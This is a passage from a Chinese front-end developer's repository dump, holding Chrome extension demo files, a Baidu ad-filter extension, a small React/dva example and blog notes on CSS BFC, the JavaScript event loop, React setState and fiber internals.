 6 | 					// 只有打开百度才显示pageAction
 7 | 					new chrome.declarativeContent.PageStateMatcher({pageUrl: {urlContains: 'baidu.com'}})
 8 | 				],
 9 | 				actions: [new chrome.declarativeContent.ShowPageAction()]
10 | 			}
11 | 		]);
12 | 	});
13 | });
14 | 


--------------------------------------------------------------------------------
/examples/chrome-plugin-demo-master/demo/sidebar.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 | <head>
 4 | 	<title>侧边栏</title>
 5 | 	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 6 | 	<style>
 7 | 	html,body{height: 100%;}
 8 | 	body{font-family: 'Microsoft Yahei';margin:0;padding:0;}
 9 | 	.center {
10 | 		position: fixed;
11 | 		left: 10px;
12 | 		top: 10px;
13 |     	width: 100%;
14 |     	height: 100%;
15 | 	    font-size: 18px;
16 | 	    color: #CCC;
17 | 	}
18 | 	</style>
19 | </head>
20 | <body>
21 | 	<div class="center"><p>这是一个自定义侧边栏</p></div>
22 | </body>
23 | </html>


--------------------------------------------------------------------------------
/examples/react-redux-test/src/routes/IndexPage.css:
--------------------------------------------------------------------------------
 1 | 
 2 | .normal {
 3 |   font-family: Georgia, sans-serif;
 4 |   margin-top: 3em;
 5 |   text-align: center;
 6 | }
 7 | 
 8 | .title {
 9 |   font-size: 2.5rem;
10 |   font-weight: normal;
11 |   letter-spacing: -1px;
12 | }
13 | 
14 | .welcome {
15 |   height: 328px;
16 |   background: url(../assets/yay.jpg) no-repeat center 0;
17 |   background-size: 388px 328px;
18 | }
19 | 
20 | .list {
21 |   font-size: 1.2em;
22 |   margin-top: 1.8em;
23 |   list-style: none;
24 |   line-height: 1.5em;
25 | }
26 | 
27 | .list code {
28 |   background: #f7f7f7;
29 | }
30 | 


--------------------------------------------------------------------------------
/examples/chrome-plugin-demo-master/demo/js/devtools.js:
--------------------------------------------------------------------------------
 1 | // 创建自定义面板，同一个插件可以创建多个自定义面板
 2 | // 几个参数依次为：panel标题、图标（其实设置了也没地方显示）、要加载的页面、加载成功后的回调
 3 | chrome.devtools.panels.create('MyPanel', 'img/icon.png', 'mypanel.html', function(panel)
 4 | {
 5 | 	console.log('自定义面板创建成功！'); // 注意这个log一般看不到
 6 | });
 7 | 
 8 | // 创建自定义侧边栏
 9 | chrome.devtools.panels.elements.createSidebarPane("Images", function(sidebar)
10 | {
11 | 	// sidebar.setPage('../sidebar.html'); // 指定加载某个页面
12 | 	sidebar.setExpression('document.querySelectorAll("img")', 'All Images'); // 通过表达式来指定
13 | 	//sidebar.setObject({aaa: 111, bbb: 'Hello World!'}); // 直接设置显示某个对象
14 | });


--------------------------------------------------------------------------------
/examples/chrome-extension/manifest.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "manifest_version": 2,
 3 | 
 4 |   "name": "库存查询",
 5 |   "description": "自动查询库存量，有库存时及时通知用户",
 6 |   "version": "1.0",
 7 | 
 8 |   "permissions": [
 9 |     "https://secure.flickr.com/",
10 |     "http://smart.supor.com:9097/",
11 |     "https://smart.supor.com:9097/",
12 |     "tabs",
13 |     "storage",
14 |     "activeTab"
15 |   ],
16 |   "browser_action": {
17 |     "default_title": "库存查询",
18 |     "default_icon": "icon.png",
19 |     "default_popup": "popup.html"
20 |   },
21 |   "content_scripts":[{
22 |     "matches": ["http://smart.supor.com:9097/*","https://smart.supor.com:9097/*"],
23 |     "js": ["js/content.js"]
24 |   }]
25 | }
26 | 


--------------------------------------------------------------------------------
/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "git-blog",
 3 |   "version": "1.0.0",
 4 |   "description": "luke-blog",
 5 |   "main": "index.js",
 6 |   "directories": {
 7 |     "test": "test"
 8 |   },
 9 |   "scripts": {
10 |     "test": "echo \"Error: no test specified\" && exit 1"
11 |   },
12 |   "repository": {
13 |     "type": "git",
14 |     "url": "git+https://github.com/luke93h/git-blog.git"
15 |   },
16 |   "keywords": [],
17 |   "author": "",
18 |   "license": "ISC",
19 |   "bugs": {
20 |     "url": "https://github.com/luke93h/git-blog/issues"
21 |   },
22 |   "homepage": "https://github.com/luke93h/git-blog#readme",
23 |   "dependencies": {
24 |     "create-react-app": "^1.5.2"
25 |   }
26 | }
27 | 


--------------------------------------------------------------------------------
/src/BFC.md:
--------------------------------------------------------------------------------
 1 | # BFC
 2 | 
 3 | ## 定义
 4 | 
 5 | > 块格式化上下文（Block Formatting Context，BFC） 是Web页面的可视化CSS渲染的一部分，是布局过程中生成块级盒子的区域，也是浮动元素与其他元素的交互限定区域。
 6 | 
 7 | ## 生成方法
 8 | 
 9 | >Floats, absolutely positioned elements, inline-blocks, table-cells, table-captions, and elements with ‘overflow’ other than ‘visible’ (except when that value has been propagated to the viewport) establish new block formatting contexts.
10 | 
11 | 浮动，绝对定位，inline-block，table-cells， table-captions，或者overflow不为'visible'都会生成BFC
12 | 
13 | ## 作用
14 | 
15 | 影响浮动定位、清除浮动
16 | 
17 | 1. 只有当元素在同一个BFC中时，垂直方向上的margin
18 | 才会clollpase.如果它们属于不同的BFC，则不会有margin collapse.因此我们可以再建立一个BFC去阻止margin collpase的发生。
19 | 
20 | 2. 利用BFC去容纳浮动元素
21 | 
22 | 3. 利用BFC阻止文本换行


--------------------------------------------------------------------------------
/src/react16-setState流程.md:
--------------------------------------------------------------------------------
 1 | # react源码分析-setState分析
 2 | 
 3 | ![原型图](https://raw.githubusercontent.com/luke93h/git-blog/master/imgs/setState.png)
 4 | 
 5 | ## 前言
 6 | 
 7 | 是否有过这样的疑问：
 8 | 
 9 | 1. setState做了什么？
10 | 2. setState是如何触发ui变化的？
11 | 
12 | ## isWorking
13 | 
14 | 如果此时isWorking为true，react将不会立即执行更新操作，而是把更新操作交给正在working的任务。（例如：由onClick触发的working）
15 | 
16 | 如果此时没有其他任务在执行，则自己主动申请执行任务（如setTimeout或ajax触发）
17 | 
18 | ## 结尾语
19 | 
20 | 没错，setState的逻辑就是这么简单。如果想了解requestWork阶段的内容，请访问[react源码分析-reactDom.render](https://github.com/luke93h/git-blog/issues/7)
21 | 
22 | ## 相关
23 | 
24 | - [react源码分析-reactDom.render](https://github.com/luke93h/git-blog/issues/7)
25 | - [事件系统分析](https://github.com/luke93h/git-blog/issues/10)
26 | 


--------------------------------------------------------------------------------
/examples/chrome-plugin-demo-master/page-action-demo/manifest.json:
--------------------------------------------------------------------------------
 1 | {
 2 | 	// 清单文件的版本，这个必须写，而且必须是2
 3 | 	"manifest_version": 2,
 4 | 	// 插件的名称
 5 | 	"name": "page-action-demo",
 6 | 	// 插件的版本
 7 | 	"version": "1.0.0",
 8 | 	// 插件描述
 9 | 	"description": "pageAction演示",
10 | 	// 图标，一般偷懒全部用一个尺寸的也没问题
11 | 	"icons":
12 | 	{
13 | 		"16": "img/icon.png",
14 | 		"48": "img/icon.png",
15 | 		"128": "img/icon.png"
16 | 	},
17 | 	// 当某些特定页面打开才显示的图标
18 | 	"page_action":
19 | 	{
20 | 		"default_icon": "img/icon.png",
21 | 		"default_title": "我是pageAction",
22 | 		"default_popup": "popup.html"
23 | 	},
24 | 	// 权限申请
25 | 	"permissions":
26 | 	[
27 | 		"declarativeContent"
28 | 	],
29 | 	"background":
30 | 	{
31 | 		"scripts": ["js/background.js"]
32 | 	}
33 | }


--------------------------------------------------------------------------------
/examples/react-redux-test/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "private": true,
 3 |   "scripts": {
 4 |     "start": "roadhog server",
 5 |     "build": "roadhog build",
 6 |     "lint": "eslint --ext .js src test",
 7 |     "precommit": "npm run lint"
 8 |   },
 9 |   "dependencies": {
10 |     "dva": "^2.2.3",
11 |     "react": "^16.2.0",
12 |     "react-dom": "^16.2.0"
13 |   },
14 |   "devDependencies": {
15 |     "babel-plugin-dva-hmr": "^0.3.2",
16 |     "eslint": "^4.14.0",
17 |     "eslint-config-umi": "^0.1.1",
18 |     "eslint-plugin-flowtype": "^2.34.1",
19 |     "eslint-plugin-import": "^2.6.0",
20 |     "eslint-plugin-jsx-a11y": "^5.1.1",
21 |     "eslint-plugin-react": "^7.1.0",
22 |     "husky": "^0.12.0",
23 |     "redbox-react": "^1.4.3",
24 |     "roadhog": "^2.0.0"
25 |   }
26 | }
27 | 


--------------------------------------------------------------------------------
/examples/chrome-plugin-demo-master/demo/background.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 | <head>
 4 | 	<title>背景页</title>
 5 | 	<meta charset="utf-8"/>
 6 | 	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 7 | 	<style>
 8 | 	html,body{height: 100%;font-size: 16px;}
 9 | 	body{font-family: 'Microsoft Yahei';margin:0;padding:0;}
10 | 	.container {
11 | 		width: 1024px;
12 | 		margin: 0 auto;
13 | 	}
14 | 	</style>
15 | </head>
16 | <body>
17 | 	<div class="container">
18 | 		<h1>这是背景页</h1>
19 | 		<div>
20 | 			<a href="#" id="test_cors">跨域演示</a>
21 | 			<a href="#" id="get_popup_title">获取popup页标题</a>
22 | 		</div>
23 | 	</div>
24 | 	<script type="text/javascript" src="js/jquery-1.8.3.js"></script>
25 | 	<script type="text/javascript" src="js/background.js"></script>
26 | </body>
27 | </html>


--------------------------------------------------------------------------------
/examples/react-redux-test/src/routes/IndexPage.js:
--------------------------------------------------------------------------------
 1 | import React from 'react';
 2 | import { connect } from 'dva';
 3 | import styles from './IndexPage.css';
 4 | import Count from './Count'
 5 | let i = 0
 6 | class IndexPage extends React.Component {
 7 |   onClick = () => {
 8 |     this.props.dispatch({
 9 |       type: 'example/add'
10 |     })
11 |   }
12 |   render(){
13 |     console.log('From Parent', ++i)
14 |     return (
15 |       <div className={styles.normal}>
16 |         <button
17 |           onClick={this.onClick}
18 |         >
19 |           点我{this.props.example.count}
20 |         </button>
21 |         <Count count={this.props.example.count}></Count>
22 |       </div>
23 |     );
24 |   }
25 | }
26 | 
27 | export default connect(state => ({
28 |   example: state.example
29 | }))(IndexPage);
30 | 


--------------------------------------------------------------------------------
/examples/BaiduAdBlock-master/BaiduAdBlock/index.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 | <title>百度搜索广告过滤</title>
 3 | 
 4 | <head>
 5 |     <meta charset="UTF-8">
 6 |     <link href="https://cdn.bootcss.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet">
 7 | </head>
 8 | 
 9 | <body style="min-width: 256px;">
10 |     <div class="container">
11 |         <h4>百度搜索广告过滤</h4>
12 |         <hr style="margin-top: 0px;">
13 | 
14 |         <p class="text-info">
15 |             <span class="glyphicon glyphicon-link" aria-hidden="true"></span>
16 |             <a target="_blank" href="https://github.com/xljiulang/BaiduAdBlock">项目源代码</a>
17 |         </p>
18 | 
19 |         <p class="text-info">
20 |             <span class="glyphicon glyphicon-user" aria-hidden="true"></span>
21 |             <span>老九 2018/9</span>
22 |         </p>
23 |     </div>
24 | </body>
25 | 
26 | </html>


--------------------------------------------------------------------------------
/examples/chrome-plugin-demo-master/demo/newtab.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 | <head>
 4 | 	<title>新标签页</title>
 5 | 	<meta charset="utf-8"/>
 6 | 	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 7 | 	<style>
 8 | 	html,body{height: 100%;}
 9 | 	body{font-family: 'Microsoft Yahei';margin:0;padding:0;}
10 | 	.center {
11 | 	    display: flex;
12 | 	    align-items: center;
13 | 	    justify-content: center;
14 | 	    height: 100%;
15 | 	    font-size: 48px;
16 | 	    color: #CCC;
17 | 	}
18 | 	.wrapper {
19 | 		position: absolute;
20 | 		top: 0;
21 | 		left: 0;
22 | 		padding: 40px;
23 | 		font-size: 16px;
24 | 	}
25 | 	</style>
26 | </head>
27 | <body>
28 | 	<div class="center"><p>这是一个自定义的新标签页</p></div>
29 | 	<div class="wrapper">
30 | 		<a href="https://www.baidu.com">百度</a>
31 | 		<a href="https://www.so.com">360搜索</a>
32 | 	</div>
33 | </body>
34 | </html>


--------------------------------------------------------------------------------
/examples/chrome-plugin-demo-master/demo/js/inject.js:
--------------------------------------------------------------------------------
 1 | // 通过postMessage调用content-script
 2 | function invokeContentScript(code)
 3 | {
 4 | 	window.postMessage({cmd: 'invoke', code: code}, '*');
 5 | }
 6 | // 发送普通消息到content-script
 7 | function sendMessageToContentScriptByPostMessage(data)
 8 | {
 9 | 	window.postMessage({cmd: 'message', data: data}, '*');
10 | }
11 | 
12 | // 通过DOM事件发送消息给content-script
13 | (function() {
14 | 	var customEvent = document.createEvent('Event');
15 | 	customEvent.initEvent('myCustomEvent', true, true);
16 | 	// 通过事件发送消息给content-script
17 | 	function sendMessageToContentScriptByEvent(data) {
18 | 		data = data || '你好，我是injected-script!';
19 | 		var hiddenDiv = document.getElementById('myCustomEventDiv');
20 | 		hiddenDiv.innerText = data
21 | 		hiddenDiv.dispatchEvent(customEvent);
22 | 	}
23 | 	window.sendMessageToContentScriptByEvent = sendMessageToContentScriptByEvent;
24 | })();
25 | 


--------------------------------------------------------------------------------
/examples/react-redux-test/src/utils/request.js:
--------------------------------------------------------------------------------
 1 | import fetch from 'dva/fetch';
 2 | 
 3 | function parseJSON(response) {
 4 |   return response.json();
 5 | }
 6 | 
 7 | function checkStatus(response) {
 8 |   if (response.status >= 200 && response.status < 300) {
 9 |     return response;
10 |   }
11 | 
12 |   const error = new Error(response.statusText);
13 |   error.response = response;
14 |   throw error;
15 | }
16 | 
17 | /**
18 |  * Requests a URL, returning a promise.
19 |  *
20 |  * @param  {string} url       The URL we want to request
21 |  * @param  {object} [options] The options we want to pass to "fetch"
22 |  * @return {object}           An object containing either "data" or "err"
23 |  */
24 | export default function request(url, options) {
25 |   return fetch(url, options)
26 |     .then(checkStatus)
27 |     .then(parseJSON)
28 |     .then(data => ({ data }))
29 |     .catch(err => ({ err }));
30 | }
31 | 


--------------------------------------------------------------------------------
/examples/BaiduAdBlock-master/BaiduAdBlock/manifest.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "百度搜索广告过滤",
 3 |   "version": "1.0.0",
 4 |   "manifest_version": 2,
 5 |   "description": "百度搜索广告过滤",
 6 |   "icons": {
 7 |     "16": "images/icon16.png",
 8 |     "48": "images/icon48.png"
 9 |   },
10 |   "browser_action": {
11 |     "default_title": "百度搜索广告过滤",
12 |     "default_icon": "images/icon16.png",
13 |     "default_popup": "index.html"
14 |   },
15 |   "background": {
16 |     "scripts": ["scripts/background.js"],
17 |     "persistent": false
18 |   },
19 |   "content_scripts": [{
20 |     "js": [
21 |       "scripts/jquery-1.7.1.min.js",
22 |       "scripts/content.js"
23 |     ],
24 |     "matches": [
25 |       "http://www.baidu.com/*",
26 |       "https://www.baidu.com/*"
27 |     ],
28 |     "run_at": "document_start"
29 |   }],
30 |   "permissions": [
31 |     "http://www.baidu.com/*",
32 |     "https://www.baidu.com/*"
33 |   ]
34 | }


--------------------------------------------------------------------------------
/examples/chrome-plugin-demo-master/demo/options.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 | <head>
 4 | 	<meta charset="utf-8"/>
 5 | 	<style>
 6 | 	body{font-size: 16px;width: 400px; height: 300px;padding: 10px;font-family: 'Microsoft Yahei'; }
 7 | 	#status {color:red;}
 8 | 	</style>
 9 | 	<title>插件配置页</title>
10 | </head>
11 | <body>
12 | 	<h1>简单的配置页</h1>
13 | 	<p>（功能很无聊，纯属演示功能）</p>
14 | 	<div>
15 | 		<label>请选择popup页面背景色：</label>
16 | 		<select id="color">
17 | 			<option value="white">white</option>
18 | 			<option value="red">red</option>
19 | 			<option value="green">green</option>
20 | 			<option value="blue">blue</option>
21 | 			<option value="yellow">yellow</option>
22 | 		</select>
23 | 	</div>
24 | 	<div>
25 | 		<label><input type="checkbox" id="show_image"/>允许网页显示图片</label>
26 | 	</div>
27 | 	<a href="javascript:;" id="save">保存配置</a>
28 | 	<div id="status"></div>
29 | 
30 | 	<script src="js/options.js"></script>
31 | </body>
32 | </html>


--------------------------------------------------------------------------------
/examples/chrome-plugin-demo-master/demo/js/options.js:
--------------------------------------------------------------------------------
 1 | document.addEventListener('DOMContentLoaded', function() {
 2 | 	var defaultConfig = {color: 'white', showImage: true}; // 默认配置
 3 | 	// 读取数据，第一个参数是指定要读取的key以及设置默认值
 4 | 	chrome.storage.sync.get(defaultConfig, function(items) {
 5 | 		document.getElementById('color').value = items.color;
 6 | 		document.getElementById('show_image').checked = items.showImage;
 7 | 	});
 8 | });
 9 | 
10 | document.getElementById('save').addEventListener('click', function() {
11 | 	var color = document.getElementById('color').value;
12 | 	var showImage = document.getElementById('show_image').checked;
13 | 	// 这里貌似会存在刷新不及时的问题
14 | 	chrome.extension.getBackgroundPage().showImage = showImage; // 让background即使生效
15 | 	chrome.storage.sync.set({color: color, showImage: showImage}, function() {
16 | 		// 注意新版的options页面alert不生效！
17 | 		// alert('保存成功！');
18 | 		document.getElementById('status').textContent = '保存成功！';
19 | 		setTimeout(() => {document.getElementById('status').textContent = '';}, 800);
20 | 	});
21 | });


--------------------------------------------------------------------------------
/event-loop.md:
--------------------------------------------------------------------------------
 1 | # Event Loop
 2 | 虽说目前chrome已经支持worker，js可以多线程运行了，但webworker仅仅能进行计算任务，不能操作DOM，所以本质上还是单线程。
 3 | 
 4 | ## 线程  
 5 |   1. js运作在浏览器中,是单线程的，即js代码始终在一个线程上执行，这个线程称为js引擎线程。  
 6 |   2. 浏览器是多线程的，除了js引擎线程，它还有： UI渲染线程、浏览器事件触发线程、http请求线程、EventLoop轮询的处理线程...
 7 |   3. 多线程之间会共享运行资源，浏览器端的js会操作dom，多个线程必然会带来同步的问题，所有js核心选择了单线程来避免处理这个麻烦。js可以操作dom，影响渲染，所以js引擎线程和UI线程是互斥的。这也就解释了js执行时会阻塞页面的渲染。
 8 | ## 同步任务
 9 |   在主线程排队支持的任务，前一个任务执行完毕后，执行后一个任务,形成一个执行栈，线程执行时在内存形成的空间为栈，进程形成堆结构，这是内存的结构。
10 | ## 异步任务  
11 |   异步任务会被主线程挂起，不会进入主线程，而是进入消息队列，而且必须指定回调函数，只有消息队列通知主线程，并且执行栈为空时，该消息对应的任务才会进入执行栈获得执行的机会。
12 | ## js运行机制
13 |   1. 所有同步任务都在主线程上执行，形成一个执行栈。 
14 |   2. 主线程之外，还存在一个”任务队列”。只要异步任务有了运行结果，就在”任务队列”之中放置一个事件。 
15 |   3. 一旦”执行栈”中的所有同步任务执行完毕，系统就会读取”任务队列”，看看里面有哪些事件。那些对应的异步任务，于是结束等待状态，进入执行栈，开始执行。
16 |   4. 主线程不断重复上面的第三步。
17 | ## Event Loop
18 |   主线程从”任务队列”中读取事件，这个过程是循环不断的，所以整个的这种运行机制又称为Event Loop（事件循环）。
19 | 
20 |   简单说，浏览器的两个线程：一个负责程序本身的运行，称为”主线程”；另一个负责主线程与其他进程（主要是各种I/O操作）的通信，被称为”Event Loop线程”（可以译为”消息线程”）。
21 | ## Task和Microtask
22 | * Task：是严格按照时间顺序压栈和执行的，所以浏览器能够使得 JavaScript 内部任务与 DOM 任务能够有序的执行。
23 | * Microtask 通常来说就是需要在当前 task 执行结束后立即执行的任务
24 | 
25 | 


--------------------------------------------------------------------------------
/examples/chrome-plugin-demo-master/demo/mypanel.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 | <head>
 4 | 	<title>新标签页</title>
 5 | 	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 6 | 	<style>
 7 | 	html,body{height: 100%;}
 8 | 	body{font-family: 'Microsoft Yahei';margin:0;padding:0;}
 9 | 	.center {
10 | 		position: fixed;
11 | 		left: 0;
12 | 		top: 0;
13 |     	width: 100%;
14 |     	height: 100%;
15 | 	    display: flex;
16 | 	    align-items: center;
17 | 	    justify-content: center;
18 | 	    font-size: 40px;
19 | 	    color: #CCC;
20 | 	}
21 | 	.content {
22 | 		position: absolute;
23 | 		left: 20px;
24 | 		top: 10px;
25 | 	}
26 | 	</style>
27 | </head>
28 | <body>
29 | 	<div class="center"><p>这是一个自定义Chrome开发者工具页面</p></div>
30 | 	<div class="content">
31 | 		<div><a href="javascript:;" id="check_jquery">检测当前页面jQuery</a></div>
32 | 		<div><a href="javascript:;" id="open_resource">查看当前页面HTML代码的第20行</a></div>
33 | 		<div><a href="javascript:;" id="test_inspect">审查当前页面第一张图片</a></div>
34 | 		<div><a href="javascript:;" id="get_all_resources">获取当前页面所有Resources</a></div>
35 | 	</div>
36 | 	<script type="text/javascript" src="js/mypanel.js"></script>
37 | </body>
38 | </html>


--------------------------------------------------------------------------------
/examples/BaiduAdBlock-master/BaiduAdBlock/scripts/content.js:
--------------------------------------------------------------------------------
 1 | ;
 2 | (function () {
 3 |     var counter = new function () {
 4 |         var _count = 0;
 5 |         var _hwdn = 0;
 6 | 
 7 |         function delay(handler, delay) {
 8 |             if (_hwdn) clearTimeout(_hwdn);
 9 |             _hwdn = setTimeout(handler, delay);
10 |         };
11 | 
12 |         this.add = function (count) {
13 |             _count = _count + count;
14 |             delay(function () {
15 |                 _count = 0;
16 |             }, 1000);
17 |             return _count;
18 |         };
19 | 
20 |         $(function () {
21 |             $('[type="submit"]').click(function () {
22 |                 _count = 0;
23 |             });
24 |         });
25 |     }
26 | 
27 |     function clearBaiduAd() {
28 |         return $("#content_left div[data-click] span:contains('广告')")
29 |             .parents("#content_left div[data-click]")
30 |             .remove()
31 |             .length;
32 |     }
33 | 
34 |     $(document).bind("DOMNodeInserted", function (e) {
35 |         var length = clearBaiduAd();
36 |         var count = counter.add(length);
37 |         chrome.runtime.sendMessage(count);
38 |     });
39 | })();


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # [Blog](https://github.com/luke93h/git-blog/issues)
 2 | 
 3 | * [react-redux源码分析](https://github.com/luke93h/git-blog/issues/2)
 4 | * [redux-saga源码分析](https://github.com/luke93h/git-blog/issues/3)
 5 | * [redux源码分析](https://github.com/luke93h/git-blog/issues/4)
 6 | * [the-super-tiny-compiler.js中文翻译](https://github.com/luke93h/git-blog/blob/master/the-super-tiny-compiler.js)/[源码地址](https://github.com/jamiebuilds/the-super-tiny-compiler)
 7 | * [javascript之toFixed踩坑记录](https://github.com/luke93h/git-blog/issues/5)
 8 | * [js线程](https://github.com/luke93h/git-blog/issues/6)
 9 | * [react架构分析](https://github.com/luke93h/git-blog/issues/7)
10 | * [react事件系统分析](https://github.com/luke93h/git-blog/issues/10)
11 | * [reactsetState分析](https://github.com/luke93h/git-blog/issues/11)
12 | * [自问自答](https://github.com/luke93h/git-blog/issues/9)
13 | * [vscode路径别名问题](https://github.com/luke93h/git-blog/issues/12)
14 | * [git回滚 ](https://github.com/luke93h/git-blog/issues/13)
15 | * [黑科技-react如何获取父元素](https://github.com/luke93h/git-blog/issues/14)
16 | * [黑科技-react如何从dom上获取fiber实例](https://github.com/luke93h/git-blog/issues/15)
17 | * [redux插件原理详解](https://github.com/luke93h/git-blog/issues/16)
18 | 
19 | > 文章保存在issue中 


--------------------------------------------------------------------------------
/src/黑科技-react如何获取父元素.md:
--------------------------------------------------------------------------------
 1 | ## 黑科技-react如何获取父元素
 2 | 
 3 | 前段时间再学习react的源码，解决了自己的一些疑惑，也发现了一些黑科技操作方法，此处分享给大家。
 4 | 
 5 | 通常父组件获得子组件的实例可以通过ref获取，那子组件如何获取父组件的实例呢？
 6 | 
 7 | 这里提供一种黑科技思路供大家玩耍
 8 | ```jsx
 9 | import React from "react";
10 | import ReactDOM from "react-dom";
11 | 
12 | import "./styles.css";
13 | 
14 | 
15 | class App extends React.Component {
16 |   constructor(props){
17 |     super(props)
18 |     this.state={
19 |       a: 1
20 |     }
21 |   }
22 |   add = () => {
23 |     this.setState({
24 |       a: this.state.a + 1
25 |     })
26 |   }
27 |   render() {
28 |     return <div>
29 |       <div>{this.state.a}</div>
30 |       <Child />
31 |     </div>
32 |   }
33 | }
34 | 
35 | class Child extends React.Component{
36 |   onClick = () => {
37 |     let parent = this._reactInternalFiber.return.return.stateNode
38 |     parent.add()
39 |   }
40 |   render(){
41 |     return <button onClick={this.onClick}>点我调用父组件</button>
42 |   }
43 | }
44 | 
45 | const rootElement = document.getElementById("root");
46 | ReactDOM.render(<App />, rootElement);
47 | 
48 | ```
49 | 
50 | 此处需要注意的是：
51 | 1. this._reactInternalFiber返回的是fiber对象
52 | 2. Child的return是div，而child的return的return才是App
53 | 3. 通过fiber.stateNode获取组件实例
54 | 4. 如果想要自动找到classCommponent，可以通过判断fiber的tag是否为2向上遍历寻找，此处不再展开。
55 | 
56 | [在线调试](https://codesandbox.io/s/ll39p3yo8z)


--------------------------------------------------------------------------------
/src/js编写动画的方式.md:
--------------------------------------------------------------------------------
 1 | # js写动画的方式
 2 | 
 3 | 1. setTimeout/setInterval
 4 | 
 5 | ```jsx
 6 | let start = (new Date()).getTime()
 7 | function move(e, dis){
 8 |   let now = (new Date()).getTime()
 9 |   let elapsed = now - start 
10 |   let fraction = elapsed/time
11 |   if( fraction < 1) {
12 |     let x = dis * fraction
13 |     e.style.left = x + 'px'
14 |     setTimeout(animate, Math.min(25, time-elapsed))
15 |   }else{
16 |     e.style.left = dis + 'px'
17 |   }
18 | }
19 | ```
20 | 
21 | 2. requestAnimationFrame
22 | 
23 | ```jsx
24 | var start = null;
25 | var element = document.getElementById('SomeElementYouWantToAnimate');
26 | element.style.position = 'absolute';
27 | 
28 | function step(timestamp) {
29 |   if (!start) start = timestamp;
30 |   var progress = timestamp - start;
31 |   element.style.left = Math.min(progress / 10, 200) + 'px';
32 |   if (progress < 2000) {
33 |     window.requestAnimationFrame(step);
34 |   }
35 | }
36 | 
37 | window.requestAnimationFrame(step);
38 | ```
39 | 
40 | 3. className
41 | 
42 | ```jsx
43 | dom.className = 'animate'
44 | ```
45 | 
46 | ## 总结
47 | 
48 | 推荐顺序： className > requestAnimationFrame > setTimeout/setInterval
49 | 
50 | 
51 | | 类别 | 优点 | 缺点 |
52 | | ------ | ------ | ------ |
53 | | setTimeout/setInterval | - | 性能 最差 |
54 | | requestAnimationFrame | 1.每一帧调用的时机通过浏览器来告知，动画更加流畅。2.可控性好 | 性能差 |
55 | | className | 1.通过css来写动画，性能好。2.js操作少，较为简单 | 只能完成简单的动画，可控性没有js动画高 |


--------------------------------------------------------------------------------
/src/黑科技-react如何从dom上获取fiber实例.md:
--------------------------------------------------------------------------------
 1 | ## 黑科技-react如何获取父元素
 2 | 
 3 | 前一篇讲了如何从获取父元素实例方法，本篇来介绍下如何从dom上获取fiber实例。
 4 | ```jsx
 5 | 
 6 | import React from "react";
 7 | import ReactDOM from "react-dom";
 8 | 
 9 | import "./styles.css";
10 | 
11 | class App extends React.Component {
12 |   constructor(props) {
13 |     super(props);
14 |     this.state = {
15 |       a: 1
16 |     };
17 |   }
18 |   add = () => {
19 |     this.setState({
20 |       a: this.state.a + 1
21 |     });
22 |   };
23 |   render() {
24 |     return (
25 |       <div>
26 |         <div>{this.state.a}</div>
27 |         <Child />
28 |       </div>
29 |     );
30 |   }
31 | }
32 | 
33 | class Child extends React.Component {
34 |   onClick = e => {
35 |     let internalKey = Object.keys(e.target).filter(
36 |       key => key.indexOf("__reactInternalInstance") >= 0
37 |     );
38 |     let fiber = e.target[internalKey];
39 |     let childFiber = getParentClassComponent(fiber);
40 |     let parentFiber = getParentClassComponent(childFiber);
41 |     parentFiber.stateNode.add();
42 |   };
43 |   render() {
44 |     return <button onClick={this.onClick}>点我调用父组件</button>;
45 |   }
46 | }
47 | 
48 | function getParentClassComponent(fiber) {
49 |   let parent = fiber.return;
50 |   if (parent.tag === 2) {
51 |     return parent;
52 |   } else {
53 |     return getParentClassComponent(parent);
54 |   }
55 | }
56 | const rootElement = document.getElementById("root");
57 | ReactDOM.render(<App />, rootElement);
58 | 
59 | 
60 | 
61 | ```
62 | 
63 | 
64 | [在线调试](https://codesandbox.io/s/101k4mr1ol)


--------------------------------------------------------------------------------
/examples/chrome-plugin-demo-master/demo/js/mypanel.js:
--------------------------------------------------------------------------------
 1 | // 检测jQuery
 2 | document.getElementById('check_jquery').addEventListener('click', function()
 3 | {
 4 | 	// 访问被检查的页面DOM需要使用inspectedWindow
 5 | 	// 简单例子：检测被检查页面是否使用了jQuery
 6 | 	chrome.devtools.inspectedWindow.eval("jQuery.fn.jquery", function(result, isException)
 7 | 	{
 8 | 		var html = '';
 9 | 		if (isException) html = '当前页面没有使用jQuery。';
10 | 		else html = '当前页面使用了jQuery，版本为：'+result;
11 | 		alert(html);
12 | 	});
13 | });
14 | 
15 | // 打开某个资源
16 | document.getElementById('open_resource').addEventListener('click', function()
17 | {
18 | 	chrome.devtools.inspectedWindow.eval("window.location.href", function(result, isException)
19 | 	{
20 | 		chrome.devtools.panels.openResource(result, 20, function()
21 | 		{
22 | 			console.log('资源打开成功！');
23 | 		});
24 | 	});
25 | });
26 | 
27 | // 审查元素
28 | document.getElementById('test_inspect').addEventListener('click', function()
29 | {
30 | 	chrome.devtools.inspectedWindow.eval("inspect(document.images[0])", function(result, isException){});
31 | });
32 | 
33 | // 获取所有资源
34 | document.getElementById('get_all_resources').addEventListener('click', function()
35 | {
36 | 	chrome.devtools.inspectedWindow.getResources(function(resources)
37 | 	{
38 | 		alert(JSON.stringify(resources));
39 | 	});
40 | });
41 | 
42 | var myconsole = 
43 | {
44 | 	_log: function(obj)
45 | 	{
46 | 		// 不知为何，这种方式不行
47 | 		chrome.devtools.inspectedWindow('console.log('+JSON.stringify(obj)+')');
48 | 	},
49 | 	log: function(obj)
50 | 	{
51 | 		// 这里有待完善
